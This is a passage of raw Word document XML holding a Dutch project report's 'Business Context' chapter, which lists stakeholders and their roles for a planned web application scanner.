            <wp:effectExtent l="0" t="0" r="0" b="444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0">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281856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C1D1714" wp14:editId="2D2B74E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-942724</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7619365" cy="11084943"/>
                <wp:effectExtent l="0" t="0" r="26035" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="569" name="Rectangle 569"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7619365" cy="11084943"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">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8D897" id="Rectangle 569" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-74.2pt;width:599.95pt;height:872.8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" fillcolor="#70ad47" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9593A8" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="007E0E66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74246C3C" w14:textId="4D38534E" w:rsidR="000379AF" w:rsidRPr="00682377" w:rsidRDefault="007E0E66" w:rsidP="007E0E66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252280832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F86DD86" wp14:editId="6BFFBA28">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912956</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3311500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13903299"/>
                <wp:effectExtent l="0" t="0" r="38100" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="567" name="Rectangle 567"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13903299"/>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E4401" id="Rectangle 567" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-260.7pt;width:25pt;height:1094.75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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D12A39">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="008A182A">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D12A39" w:rsidRPr="00D12A39">
        <w:t>usiness</w:t>
      </w:r>
      <w:r w:rsidR="0009402E">
        <w:t xml:space="preserve"> Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EA5A5" w14:textId="131D8CE1" w:rsidR="00017EF0" w:rsidRDefault="00017EF0"/>
    <w:p w14:paraId="6195D62A" w14:textId="675626EE" w:rsidR="00376604" w:rsidRPr="00E85D96" w:rsidRDefault="00ED7ECD" w:rsidP="00376604">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85D96">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4429E33B" w14:textId="692C8FFA" w:rsidR="00376604" w:rsidRDefault="00C70C5A" w:rsidP="00376604">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik behandelen wat het business context is van het project. </w:t>
      </w:r>
      <w:r w:rsidR="00457EEE">
        <w:t>Er zal onderzoek gedaan worden naa</w:t>
      </w:r>
      <w:r w:rsidR="002832D8">
        <w:t>r de</w:t>
      </w:r>
      <w:r w:rsidR="00457EEE">
        <w:t xml:space="preserve"> business doelen van het project, wie de stakeholde</w:t>
      </w:r>
      <w:r w:rsidR="00432F6B">
        <w:t>rs zijn en wat de doelgroep is.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F632C9" w14:paraId="4831F383"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42DB2D1" w14:textId="22488D51" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Business doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="24354E5C"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57BE88" w14:textId="546225B4" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="5FF3AD34" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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63F1E77D" w:rsidR="0054788A" w:rsidRDefault="00767E9B" w:rsidP="003462BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00FA5E1D">
        <w:t xml:space="preserve">Stakeholders en </w:t>
      </w:r>
      <w:r>
        <w:t>Business doelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E89DA8" w14:textId="77777777" w:rsidR="00B864DB" w:rsidRPr="00B864DB" w:rsidRDefault="00B864DB" w:rsidP="00B864DB"/>
    <w:p w14:paraId="4F18A7BF" w14:textId="4285B6FE" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r w:rsidRPr="008D1424">
        <w:t>Het is voor Stakeholders van b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elang dat zij weten wat het nut is van een systeem. Als het niet duidelijk is waarom een systeem wordt gebouwd dan is er </w:t>
      </w:r>
      <w:r w:rsidR="00AE4CF0">
        <w:t>een grote kans dat het doeleind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ook niet volledig </w:t>
      </w:r>
      <w:r w:rsidR="00862320">
        <w:t>wordt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bereikt. De vragen die gesteld moeten worden voor het definiëren van het nut en doeleindes van een systeem zijn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE82220" w14:textId="310482B8" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wat zijn de </w:t>
      </w:r>
      <w:r w:rsidR="008365C4">
        <w:t xml:space="preserve">vastgestelde </w:t>
      </w:r>
      <w:r w:rsidR="00341AD3">
        <w:t>doelen voor het nieuwe g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eautomatiseerde </w:t>
      </w:r>
      <w:r w:rsidR="00341AD3">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00341AD3">
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:t>ysteem?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A3BA0" w14:textId="5962D531" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wie</w:t>
      </w:r>
      <w:r w:rsidR="0061610D">
        <w:t xml:space="preserve"> zijn de stakeholders?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC67D58" w14:textId="0580E261" w:rsidR="0061610D" w:rsidRDefault="0061610D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wie is de doelgroep?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1DD8A" w14:textId="2EF9E348" w:rsidR="000A3B05" w:rsidRDefault="0062121F" w:rsidP="000A3B05">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="000A3B05">
        <w:t>Stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCC9E78" w14:textId="77777777" w:rsidR="000A3B05" w:rsidRDefault="000A3B05"/>
    <w:p w14:paraId="15B309CB" w14:textId="3122B0A5" w:rsidR="00DB07D1" w:rsidRDefault="004E1F30">
      <w:r>
        <w:t>Het identificeren</w:t>
      </w:r>
      <w:r w:rsidR="000E2F65">
        <w:t xml:space="preserve"> van stakeholders is meestal de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eerste stap in het schrijven </w:t>
      </w:r>
      <w:r w:rsidR="009D574D">
        <w:t>van ee</w:t>
      </w:r>
      <w:r w:rsidR="000E2F65">
        <w:t>n business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609293B0" w:rsidR="003E7585" w:rsidRDefault="00F34FAA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251949056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17695B4E" wp14:editId="2F66F143">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>942340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>387985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3776980" cy="2847340"/>
            <wp:effectExtent l="0" t="0" r="762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6980" cy="2847340"/>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8AF6D10" w:rsidR="00F67D19" w:rsidRDefault="002F1545">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C37ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B22B1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D92FC5">
        <w:tab/>
        <w:t>Figuur 2.1</w:t>
      </w:r>
      <w:r w:rsidR="00F67D19">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E9F57" w14:textId="1AE1737E" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252126208" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BBE46D8" wp14:editId="7839F911">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896159</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-270380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="49" name="Rectangle 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AAC7D" id="Rectangle 49" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-21.25pt;width:25pt;height:1031.7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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="338382B4" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1"/>
    <w:p w14:paraId="28E4376E" w14:textId="3A8791A7" w:rsidR="006813C6" w:rsidRDefault="006813C6">
      <w:r>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w:t>
      </w:r>
      <w:r w:rsidR="00471BE0">
        <w:t>k meer inzicht op het probleem, zo kun je het vanuit een ander hoek be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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Primaire stakeholders worden direct beïnvloed (</w:t>
      </w:r>
      <w:r w:rsidR="005A05CB">
        <w:t>positief of negatief</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910A0A3" w14:textId="2D14387F" w:rsidR="009C1A92" w:rsidRDefault="009C1A92" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secondaire stakeholders worden mogelijk beïnvloed door </w:t>
      </w:r>
      <w:r w:rsidR="005A05CB">
        <w:t>de primaire stakeholders (positief of negatief)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="9357" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1046"/>
        <w:gridCol w:w="4650"/>
        <w:gridCol w:w="3661"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F5608B" w14:paraId="63680853" w14:textId="77777777" w:rsidTr="005A427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cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E438E9" w14:textId="13EB7958" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="224725AD"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707A637A" w14:textId="151B0BCA"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imaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="22A47733" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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Klanten van S5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3958E70C" w14:textId="6152928C"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Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="2AF6714B"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Ontwikkelaars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6C333D" w14:textId="37CCE106"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imaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="33DCA1A8" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007F6F47" w14:textId="49E166B1"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Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="01460BCD"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3232709C" w14:textId="0B13F278" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5416DB69" w14:textId="1F22E8B2" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00B16316" w:rsidP="005B1B18">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Concurrentie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC3F53" w14:textId="672D6106"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econdaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="42CC97BA" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="1013"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34680FEA" w14:textId="7D319CD4" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17374799" w14:textId="6C7A5951"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Bijdragers (ontwikkelaars)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC265EA" w14:textId="52487C83"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Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="3A074014" w14:textId="77777777" w:rsidTr="005A427C">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46" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59971569" w14:textId="43320FBD" w:rsidR="00ED14AA" w:rsidRPr="00F5608B" w:rsidRDefault="00ED14AA" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="141D3770" w14:textId="2CC177BB" w:rsidR="00ED14AA"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ogrammeer Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE47271" w14:textId="41DD9FB5" w:rsidR="00ED14AA"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econdaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54DFCDBA" w14:textId="1C4A1F7E" w:rsidR="006813C6" w:rsidRDefault="00272E09" w:rsidP="005B1B18">
      <w:r>
        <w:t>Tabel 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A6D5A" w14:textId="5A20BE54" w:rsidR="005B0DB7" w:rsidRDefault="00126FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="005B0DB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989D50D" w14:textId="660B861D" w:rsidR="00F322D2" w:rsidRDefault="00F32E36">
      <w:r>
        <w:t>De primaire stake</w:t>
      </w:r>
      <w:r w:rsidR="00342845">
        <w:t>holders zijn het</w:t>
      </w:r>
      <w:r w:rsidR="00470A7E">
        <w:t xml:space="preserv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r w:rsidR="00156F3E">
        <w:t xml:space="preserve"> Secondaire</w:t>
      </w:r>
      <w:r w:rsidR="00D03474">
        <w:t xml:space="preserve"> stakeholders hebben indirect invloed op het project </w:t>
      </w:r>
      <w:r w:rsidR="00BD2530">
        <w:t>en hebben een meestal een klein belang bij het project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EFE18" w14:textId="77925665" w:rsidR="00F322D2" w:rsidRDefault="00F322D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F322D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rollen</w:t>
      </w:r>
      <w:r w:rsidR="00B3151C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> van primaire stackholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950AEEF" w14:textId="34E5EAC9" w:rsidR="00456DAE" w:rsidRPr="00456DAE" w:rsidRDefault="00FD2B9F" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">S5 – De opdrachtgevers van het project en </w:t>
      </w:r>
      <w:r w:rsidR="004C7C0D">
        <w:t>product owners</w:t>
      </w:r>
      <w:r w:rsidR="00456DAE">
        <w:t>. Zij zijn deels verantwoordelijk voor</w:t>
      </w:r>
      <w:r w:rsidR="002A38E3">
        <w:t xml:space="preserve"> het goedkeuren van userpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16CF3B" w14:textId="5EF8353E" w:rsidR="0094505B" w:rsidRPr="0094505B" w:rsidRDefault="00456DAE" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ontwikkelaars – Zij zijn verantwoordelijk voor het ontwikkelen van</w:t>
      </w:r>
      <w:r w:rsidR="0094505B">
        <w:t xml:space="preserve"> het softwaresysteem (</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="0094505B">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEA67F" w14:textId="569EAD47" w:rsidR="00F875D2" w:rsidRPr="00F875D2" w:rsidRDefault="00085DCC" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Klanten S5 – Zij zijn de eindgebruikers </w:t>
      </w:r>
      <w:r w:rsidR="009546FF">
        <w:t>van het softwaresysteem, hun belangen staan vooraan in het project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF1ACE" w14:textId="0DCD6BF8" w:rsidR="00B27C83" w:rsidRPr="00126FCF" w:rsidRDefault="00F875D2" w:rsidP="00126FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>Zij beheren het softwaresy</w:t>
      </w:r>
      <w:r w:rsidR="00085DCC">
        <w:t xml:space="preserve">steem na dat het live is gegaan, een voorbeeld hiervan is: </w:t>
      </w:r>
      <w:r w:rsidR="00E149B4">
        <w:t>het beheren van scans en rapporten</w:t>
      </w:r>
      <w:r w:rsidR="00B27C83" w:rsidRPr="00126FCF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4ECB0" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00322D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1988E200" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00322D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3352C71C" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00322D15">
      <w:pPr>
